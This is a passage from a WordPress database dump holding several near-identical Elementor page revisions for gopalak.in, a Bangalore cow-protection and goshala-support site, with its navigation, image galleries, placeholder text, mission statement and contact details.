.elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:54:56','2022-10-13 10:24:56','',1373,'https://gopalak.in/?p=1717',0,'revision','',0),(1718,1,'2022-10-13 15:54:56','2022-10-13 10:24:56','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:54:56','2022-10-13 10:24:56','',1373,'https://gopalak.in/?p=1718',0,'revision','',0),(1719,1,'2022-10-13 15:57:26','2022-10-13 10:27:26','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:57:26','2022-10-13 10:27:26','',1373,'https://gopalak.in/?p=1719',0,'revision','',0),(1720,1,'2022-10-13 15:57:26','2022-10-13 10:27:26','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:57:26','2022-10-13 10:27:26','',1373,'https://gopalak.in/?p=1720',0,'revision','',0),(1721,1,'2022-10-13 15:57:27','2022-10-13 10:27:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel 